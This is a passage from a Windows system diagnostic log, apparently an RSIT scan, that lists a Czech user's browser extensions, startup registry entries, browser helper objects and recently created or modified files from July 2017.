"Path"=C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL


C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\
{ea614400-e918-4741-9a97-7a972ff7c30b}

C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\addons.json
Adblock Plus - extension - {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
Seznam lištička - extension - {ea614400-e918-4741-9a97-7a972ff7c30b}
uBlock Origin - extension - uBlock0@raymondhill.net

C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions.json
Avast Online Security - webextension - wrc@avast.com - C:\Program Files\AVAST Software\Avast\WebRep\FF48
Avast SafePrice - webextension - sp@avast.com - C:\Program Files\AVAST Software\Avast\SafePrice\FF48
Seznam lištička - extension - {ea614400-e918-4741-9a97-7a972ff7c30b} - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\{ea614400-e918-4741-9a97-7a972ff7c30b}
Adblock Plus - extension - {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
Multi-process staged rollout - extension - e10srollout@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\e10srollout@mozilla.org.xpi
Pocket - extension - firefox@getpocket.com - C:\Program Files (x86)\Mozilla Firefox\browser\features\firefox@getpocket.com.xpi
Web Compat - extension - webcompat@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi
Application Update Service Helper - extension - aushelper@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\aushelper@mozilla.org.xpi
Firefox Screenshots - extension - screenshots@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi
Default - theme - {972ce4c6-7e08-4474-a285-3208198ce6fd} - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi
Follow-on Search Telemetry - extension - followonsearch@mozilla.com - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\features\{627a1210-f1fc-4161-b4a6-49ca822f1466}\followonsearch@mozilla.com.xpi
Shield Recipe Client - extension - shield-recipe-client@mozilla.org - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\features\{627a1210-f1fc-4161-b4a6-49ca822f1466}\shield-recipe-client@mozilla.org.xpi
uBlock Origin - extension - uBlock0@raymondhill.net - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\uBlock0@raymondhill.net.xpi

C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\pluginreg.dat
Plugin - Shockwave Flash - 26.0.0.137 - C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_137.dll

=========Google Chrome=========

C:\Users\Eva Blažková\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Extension aapocclcgogkmnckokdopfmhonfmgoek 1 Prezentace Google 0.9
Extension ahfgeienlihckogmohjhadlkjgocpleb 1 Obchod Chrome 0.2
Extension aohghmighlieiainnegkcijnfilokake 1 Dokumenty Google 0.9
Extension apdfllckaahabafndbhieahigkjlhalf 1 Disk Google 14.1
Extension bepbmhgboaologfdajaanbcjmnhjmhfn 0
Extension bgjpfhpjcgdppjbgnpnjllokbmcdllig 1 Seznam Lištička - Email 1.4.2
Extension blmojkbhnkkphngknkmgccmlenfaelkd 1 Seznam Lištička - Slovník 1.4.6
Extension blpcfgokakmgnkcojhhkbfbldkacnbeo 1 YouTube 4.2.8
Extension cjpalhdlnbpafiamejdnhcphjbkeiagm 1 uBlock Origin 1.13.2
Extension coobgpohoikkiipiblmjeljniedjpjpf 1 Vyhledávání Google 0.0.0.30
Extension eemcgdkfndhakfknompkggombfjjjeno 1 Bookmark Manager 0.1
Extension efaidnbmnnnibpcajpcglclefindmkaj 2 Adobe Acrobat 15.1.0.3
Extension ennkphjdgehloodpbhlhldgbnhmacadg 1 Settings 0.2
Extension eofcbnmajmjmplflapaojjnihcjkigck 0 Avast SafePrice 12.0.222
Extension gdkkmnngogaccacpomdhdiahljbjihoc 1 Farmville 2 Beacon 1.5
Extension gfdkimpbcpahaombhbimeihdjnejgicl 1 Feedback 1.0
Extension ghbmnnjooekpmoecnnnilnnbdlolhkhi 0 Dokumenty Google offline 1.4
Extension giehconkeccliemdfiadldepjbbdjllm 1 IATE 2.2
Extension gomekmidlodglbbmalcneegieacbdmki 2 Avast Online Security 10.2.0.190
Extension ilfoopambfaclfjmpiaijnccgcmbeigi 1 FormApps Extension 2.5.0.27
Extension kmendfapggjehodndflmmgagdbamhnfd 1 CryptoTokenExtension 0.9.46
Extension mfehgcgbbipciphmccgaenjidiccnmng 1 Cloud Print 0.1
Extension mgndgikekgjfcpckkfioiadnlibdjbkf 1 Chrome 0.1
Extension mhjfbmdgcfjbbpaeojofohoefgiehjai 1 Chrome PDF Viewer 1
Extension neajdppkdcdipfabeoofebfddakdcjhd 1 Google Network Speech 1.0
Extension nkeimhogjdpnpccoofpliimaahmaaome 1 Google Hangouts 1.3.3
Extension nmmhkkegccagdldgiimedpiccmgmieda 1 Platby Internetového obchodu Chrome 1.0.0.2
Extension olfeabkoenfaoljndfecamgilllcpiak 1 Seznam Lištička - Rychlá volba 1.9.1
Extension pafkbggdmjlpgkdkcbjmhmfcdpncadgh 1 Google Now 1.2.0.1
Extension pjkljhegncpnkpknbcohdijeoejaedia 1 Gmail 8.1
Extension pkedcjkdefgpdelpbcmbmeomcjbeemfm 1 Chrome Media Router 5917.424.0.6
Homepage: http://www.seznam.cz/
default_search_provider.search_url:
C:\Users\Eva Blažková\AppData\Local\Google\Chrome\User Data\Default\Preferences
Homepage:
default_search_provider.search_url:

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eofcbnmajmjmplflapaojjnihcjkigck]
"Path"=C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gomekmidlodglbbmalcneegieacbdmki]
"Path"=C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx


======Registry dump ======


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}]
"URL"=http://www.bing.com/search?q={searchTer ... TR&pc=ACJB


[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes\{3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}]
"URL"=http://www.bing.com/search?q={searchTer ... TR&pc=ACJB

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3785D0AD-BFFF-47F6-BF5B-A587C162FED9}]
Canon Easy-WebPrint EX BHO - C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23 217784]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{449D0D6E-2412-4E61-B68F-1CB625CD9E52}]
ExplorerBHO Class - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-01-18 796352]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 6671064]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-04-26 895528]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL [2013-03-06 690392]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EA801577-E6AD-4BD5-8F71-4BE0154331A4}]
ClassicIEBHO Class - C:\Program Files\Classic Shell\ClassicIEDLL_64.dll [2014-01-18 483520]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3785D0AD-BFFF-47F6-BF5B-A587C162FED9}]
Canon Easy-WebPrint EX BHO - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23 184488]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{449D0D6E-2412-4E61-B68F-1CB625CD9E52}]
ExplorerBHO Class - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-01-18 674496]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 4171480]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-26 773920]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~2\MICROS~2\Office14\URLREDIR.DLL [2013-03-06 562904]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EA801577-E6AD-4BD5-8F71-4BE0154331A4}]
ClassicIEBHO Class - C:\Program Files\Classic Shell\ClassicIEDLL_32.dll [2014-01-18 437440]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{553891B7-A0D5-4526-BE18-D3CE461D6310} - Classic Explorer Bar - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-01-18 796352]
{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - Canon Easy-WebPrint EX - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23 6149288]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\Toolbar]
{553891B7-A0D5-4526-BE18-D3CE461D6310} - Classic Explorer Bar - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-01-18 674496]
{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - Canon Easy-WebPrint EX - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23 4452504]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RTHDVCPL"=C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-21 13672304]
"Classic Start Menu"=C:\Program Files\Classic Shell\ClassicStartMenu.exe [2014-01-18 161984]
"AutoRearm"=C:\WINDOWS\AutoRearm\AutoRearm.exe [2014-11-11 529408]
"BCSSync"=C:\Program Files\Microsoft Office\Office14\BCSSync.exe [2012-11-05 108144]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2017-04-26 213824]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"BtvStack"=C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [2014-02-26 134784]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cz.seznam.software.autoupdate"=C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\szninstall.exe [2013-05-16 1062472]
"cz.seznam.software.szndesktop"=C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe [2015-05-26 103080]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"seznam-listicka-distribuce"=C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe [2013-05-16 1062472]
"CanonQuickMenu"=C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [2016-03-11 1314432]
"IJNetworkScannerSelectorEX"=C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [2014-01-15 438888]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"BtvStack"=C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [2014-02-26 134784]

C:\Users\Eva Blažková\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Výřezy obrazovky a spuštění aplikace OneNote 2010.lnk - C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 6671064]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 4171480]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iaioi2ce.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\MCODS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mcpltsvc]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"SoftwareSASGeneration"=1

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]


[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
"StubPath" = "C:\Program Files (x86)\Google\Chrome\Application\59.0.3071.115\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"VIDC.YUY2"=msyuv.dll
"vidc.i420"=iyuv_32.dll
"msacm.msgsm610"=msgsm32.acm
"msacm.msg711"=msg711.acm
"VIDC.YVYU"=msyuv.dll
"VIDC.YVU9"=tsbyuv.dll
"wavemapper"=msacm32.drv
"midimapper"=midimap.dll
"VIDC.UYVY"=msyuv.dll
"VIDC.IYUV"=iyuv_32.dll
"vidc.mrle"=msrle32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msadpcm"=msadp32.acm
"vidc.msvc"=msvidc32.dll
"MSVideo8"=VfWWDM32.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv

====== File associations ======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*

====== List of files/folders created in the last 1 month ======

2017-07-17 10:51:49 ----D---- C:\rsit
2017-07-17 10:51:25 ----D---- C:\ProgramData\SWCUTemp
2017-07-12 15:19:59 ----A---- C:\WINDOWS\system32\aepic.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\generaltel.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\devinv.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\centel.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\appraiser.dll
2017-07-12 15:19:58 ----A---- C:\WINDOWS\system32\aeinv.dll
2017-07-12 15:19:57 ----A---- C:\WINDOWS\system32\invagent.dll
2017-07-12 15:19:57 ----A---- C:\WINDOWS\system32\CompatTelRunner.exe
2017-07-12 15:19:57 ----A---- C:\WINDOWS\system32\acmigration.dll
2017-07-12 08:44:03 ----A---- C:\WINDOWS\system32\mshtml.dll
2017-07-12 08:44:00 ----A---- C:\WINDOWS\system32\jscript9.dll
2017-07-12 08:43:58 ----A---- C:\WINDOWS\SYSWOW64\mshtml.dll
2017-07-12 08:43:55 ----A---- C:\WINDOWS\SYSWOW64\jscript9.dll
2017-07-12 08:43:53 ----A---- C:\WINDOWS\system32\tquery.dll
2017-07-12 08:43:52 ----A---- C:\WINDOWS\SYSWOW64\tquery.dll
2017-07-12 08:43:52 ----A---- C:\WINDOWS\system32\win32k.sys
2017-07-12 08:43:51 ----A---- C:\WINDOWS\system32\ieframe.dll
2017-07-12 08:43:50 ----A---- C:\WINDOWS\SYSWOW64\mssrch.dll
2017-07-12 08:43:50 ----A---- C:\WINDOWS\system32\mssrch.dll
2017-07-12 08:43:49 ----A---- C:\WINDOWS\SYSWOW64\msxml3.dll
2017-07-12 08:43:49 ----A---- C:\WINDOWS\system32\msxml3.dll
2017-07-12 08:43:48 ----A---- C:\WINDOWS\system32\urlmon.dll
2017-07-12 08:43:48 ----A---- C:\WINDOWS\system32\ntoskrnl.exe
2017-07-12 08:43:48 ----A---- C:\WINDOWS\system32\kerberos.dll
2017-07-12 08:43:47 ----A---- C:\WINDOWS\SYSWOW64\kerberos.dll
2017-07-12 08:43:47 ----A---- C:\WINDOWS\system32\drivers\ntfs.sys
2017-07-12 08:43:46 ----A---- C:\WINDOWS\SYSWOW64\urlmon.dll
2017-07-12 08:43:46 ----A---- C:\WINDOWS\SYSWOW64\ieframe.dll
2017-07-12 08:43:45 ----A---- C:\WINDOWS\system32\winresume.exe
2017-07-12 08:43:45 ----A---- C:\WINDOWS\system32\winload.exe
2017-07-12 08:43:44 ----A---- C:\WINDOWS\system32\drivers\http.sys
2017-07-12 08:43:43 ----A---- C:\WINDOWS\system32\certutil.exe
2017-07-12 08:43:43 ----A---- C:\WINDOWS\system32\autoconv.exe
2017-07-12 08:43:42 ----A---- C:\WINDOWS\SYSWOW64\vbscript.dll
2017-07-12 08:43:42 ----A---- C:\WINDOWS\SYSWOW64\untfs.dll
2017-07-12 08:43:42 ----A---- C:\WINDOWS\SYSWOW64\autoconv.exe
2017-07-12 08:43:41 ----A---- C:\WINDOWS\SYSWOW64\certutil.exe
2017-07-12 08:43:41 ----A---- C:\WINDOWS\system32\vbscript.dll
2017-07-12 08:43:41 ----A---- C:\WINDOWS\system32\uReFS.dll
2017-07-12 08:43:41 ----A---- C:\WINDOWS\system32\untfs.dll
2017-07-12 08:43:40 ----A---- C:\WINDOWS\SYSWOW64\uReFS.dll
2017-07-12 08:43:40 ----A---- C:\WINDOWS\system32\termsrv.dll
2017-07-12 08:43:39 ----A---- C:\WINDOWS\SYSWOW64\WSDApi.dll
2017-07-12 08:43:39 ----A---- C:\WINDOWS\system32\srvsvc.dll
2017-07-12 08:43:39 ----A---- C:\WINDOWS\system32\drivers\clfs.sys
2017-07-12 08:43:38 ----A---- C:\WINDOWS\system32\WSDApi.dll
2017-07-12 08:43:38 ----A---- C:\WINDOWS\system32\ExplorerFrame.dll
2017-07-12 08:43:37 ----A---- C:\WINDOWS\system32\drivers\srv.sys
2017-07-12 08:43:36 ----A---- C:\WINDOWS\system32\wininet.dll
2017-07-12 08:43:36 ----A---- C:\WINDOWS\system32\smbwmiv2.dll
2017-07-12 08:43:36 ----A---- C:\WINDOWS\system32\drivers\srvnet.sys
2017-07-12 08:43:35 ----A---- C:\WINDOWS\SYSWOW64\Wldap32.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\SYSWOW64\uudf.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\SYSWOW64\ifsutil.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\system32\ifsutil.dll
2017-07-12 08:43:35 ----A---- C:\WINDOWS\system32\drivers\storport.sys
2017-07-12 08:43:34 ----A---- C:\WINDOWS\SYSWOW64\ExplorerFrame.dll
2017-07-12 08:43:34 ----A---- C:\WINDOWS\system32\wvc.dll
2017-07-12 08:43:34 ----A---- C:\WINDOWS\system32\uudf.dll
2017-07-12 08:43:34 ----A---- C:\WINDOWS\system32\DAFWSD.dll
2017-07-12 08:43:33 ----A---- C:\WINDOWS\system32\Wldap32.dll
2017-07-12 08:43:33 ----A---- C:\WINDOWS\system32\msinfo32.exe
2017-07-12 08:43:32 ----AC---- C:\WINDOWS\system32\drivers\stornvme.sys
2017-07-12 08:43:32 ----A---- C:\WINDOWS\system32\wdc.dll
2017-07-12 08:43:32 ----A---- C:\WINDOWS\system32\drivers\srv2.sys
2017-07-12 08:43:32 ----A---- C:\WINDOWS\system32\drivers\netio.sys
2017-07-12 08:43:31 ----A---- C:\WINDOWS\SYSWOW64\wininet.dll
2017-07-12 08:43:31 ----A---- C:\WINDOWS\system32\drivers\pdc.sys
2017-07-12 08:43:30 ----A---- C:\WINDOWS\SYSWOW64\wsdchngr.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\SYSWOW64\wdc.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\SYSWOW64\ulib.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\wsdchngr.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\uexfat.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\jscript.dll
2017-07-12 08:43:30 ----A---- C:\WINDOWS\system32\cnvfat.dll
2017-07-12 08:43:29 ----A---- C:\WINDOWS\SYSWOW64\uexfat.dll
2017-07-12 08:43:29 ----A---- C:\WINDOWS\SYSWOW64\msinfo32.exe
2017-07-12 08:43:29 ----A---- C:\WINDOWS\system32\ulib.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\SYSWOW64\ufat.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\system32\ufat.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\system32\sscore.dll
2017-07-12 08:43:28 ----A---- C:\WINDOWS\system32\rdsdwmdr.dll
2017-07-12 08:43:25 ----AC---- C:\WINDOWS\system32\drivers\bthpan.sys
2017-07-12 08:43:25 ----A---- C:\WINDOWS\SYSWOW64\wvc.dll
2017-07-12 08:43:25 ----A---- C:\WINDOWS\SYSWOW64\sscore.dll
2017-07-12 08:43:25 ----A---- C:\WINDOWS\SYSWOW64\cnvfat.dll
2017-07-12 08:43:25 ----A---- C:\WINDOWS\system32\snmptrap.exe
2017-07-12 08:43:23 ----A---- C:\WINDOWS\system32\msfeeds.dll
2017-07-12 08:43:23 ----A---- C:\WINDOWS\system32\inetcomm.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\SYSWOW64\msfeeds.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\SYSWOW64\inetcomm.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\SYSWOW64\glcndFilter.dll
2017-07-12 08:43:22 ----A---- C:\WINDOWS\system32\convert.exe
2017-07-12 08:43:21 ----A---- C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-07-12 08:43:20 ----A---- C:\WINDOWS\SYSWOW64\Windows.Data.Pdf.dll
2017-07-12 08:43:20 ----A---- C:\WINDOWS\system32\glcndFilter.dll
2017-07-12 08:43:19 ----A---- C:\WINDOWS\SYSWOW64\jscript.dll
2017-07-12 08:43:19 ----A---- C:\WINDOWS\SYSWOW64\ieapfltr.dll
2017-07-12 08:43:19 ----A---- C:\WINDOWS\system32\ieapfltr.dll
2017-07-06 11:54:15 ----A---- C:\WINDOWS\SYSWOW64\ssinstall-uninstall.bat
2017-07-06 11:54:14 ----A---- C:\WINDOWS\SYSWOW64\ssleay32.dll
2017-07-06 11:54:14 ----A---- C:\WINDOWS\SYSWOW64\libeay32.dll
2017-07-06 11:54:13 ----A---- C:\WINDOWS\SYSWOW64\ssins.exe
2017-07-04 18:36:52 ----D---- C:\KVRT_Data
2017-07-04 18:36:22 ----D---- C:\ProgramData\AppData
2017-07-03 14:21:13 ----D---- C:\Program Files (x86)\OpenOffice 4

====== List of files/folders modified in the last 1 month ======

2017-07-17 10:51:52 ----D---- C:\Program Files\trend micro
2017-07-17 10:51:39 ----D---- C:\WINDOWS\Prefetch
2017-07-17 10:51:26 ----D---- C:\WINDOWS\Temp
2017-07-17 10:51:25 ----HD---- C:\ProgramData
2017-07-17 10:50:19 ----D---- C:\Users\Eva Blažková\AppData\Roaming\ClassicShell
2017-07-17 10:02:01 ----D---- C:\WINDOWS\system32\sru
2017-07-17 07:58:11 ----D---- C:\WINDOWS\system32\drivers
2017-07-17 07:00:02 ----D---- C:\WINDOWS\AppReadiness
2017-07-16 19:52:54 ----D---- C:\WINDOWS\rescache
2017-07-16 07:56:24 ----RSD---- C:\WINDOWS\assembly
2017-07-15 07:54:50 ----D---- C:\WINDOWS\system32\config
2017-07-14 23:16:00 ----D---- C:\WINDOWS\Microsoft.NET
2017-07-14 18:31:31 ----D---- C:\WINDOWS\Inf
2017-07-14 11:59:06 ----D---- C:\WINDOWS\system32\DriverStore
2017-07-13 13:50:23 ----D---- C:\WINDOWS\WinSxS
2017-07-13 12:58:38 ----RD---- C:\WINDOWS\System32
2017-07-13 12:58:38 ----D---- C:\WINDOWS\system32\appraiser
2017-07-13 12:35:04 ----D---- C:\WINDOWS\system32\MRT
2017-07-13 12:29:53 ----AC---- C:\WINDOWS\system32\MRT.exe
2017-07-13 12:29:46 ----D---- C:\WINDOWS\CbsTemp
2017-07-13 12:01:36 ----D---- C:\ModelHE
2017-07-13 11:55:45 ----SHD---- C:\WINDOWS\Installer
2017-07-13 11:55:44 ----SHD---- C:\Config.Msi
2017-07-13 11:54:33 ----D---- C:\WINDOWS\SysWOW64
2017-07-12 10:00:31 ----D---- C:\WINDOWS\system32\wbem
2017-07-12 10:00:31 ----D---- C:\WINDOWS\system32\drivers\en-US
2017-07-12 10:00:31 ----D---- C:\WINDOWS\system32\drivers\cs-CZ
2017-07-12 09:26:05 ----D---- C:\WINDOWS\SYSWOW64\Macromed
2017-07-12 09:09:33 ----D---- C:\ProgramData\Microsoft Help
2017-07-12 08:59:20 ----SHD---- C:\System Volume Information
2017-07-12 08:29:54 ----D---- C:\WINDOWS\system32\catroot2
2017-07-10 12:19:19 ----D---- C:\ProgramData\CanonIJPLM
2017-07-10 08:50:44 ----D---- C:\WINDOWS\system32\NDF
2017-07-10 08:46:35 ----D---- C:\Program Files (x86)\TeamViewer
2017-07-09 17:30:01 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2017-07-07 15:25:47 ----D---- C:\WINDOWS\system32\Tasks
2017-07-06 12:02:05 ----D---- C:\ProgramData\Adobe
2017-07-06 10:55:08 ----D---- C:\WINDOWS\debug
2017-07-05 13:42:41 ----D---- C:\Program Files (x86)\Google
2017-07-05 12:42:58 ----D---- C:\WINDOWS\system32\Macromed
2017-07-05 12:41:59 ----D---- C:\WINDOWS\SoftwareDistribution
2017-07-05 12:26:15 ----D---- C:\WINDOWS\Tasks
2017-07-05 12:23:28 ----D---- C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz
2017-07-05 12:22:41 ----D---- C:\Program Files (x86)\Adobe
2017-07-05 12:17:34 ----D---- C:\Windows
2017-07-05 11:57:32 ----D---- C:\Program Files (x86)\Mozilla Firefox
2017-07-05 11:43:42 ----RD---- C:\Program Files (x86)
2017-07-04 22:59:19 ----HD---- C:\Program Files\WindowsApps
2017-07-04 22:56:23 ----D---- C:\Program Files (x86)\MyHeritage
2017-07-03 14:21:33 ----RSD---- C:\WINDOWS\Fonts
2017-06-30 02:27:57 ----A---- C:\WINDOWS\SYSWOW64\FlashPlayerApp.exe

File C:\WINDOWS\system32\winlogon.exe is digitally signed
File C:\WINDOWS\system32\wininit.exe is digitally signed
File C:\WINDOWS\explorer.exe is digitally signed
File C:\WINDOWS\SysWOW64\explorer.exe is digitally signed
File C:\WINDOWS\system32\svchost.exe is digitally signed
File C:\WINDOWS\SysWOW64\svchost.exe is digitally signed
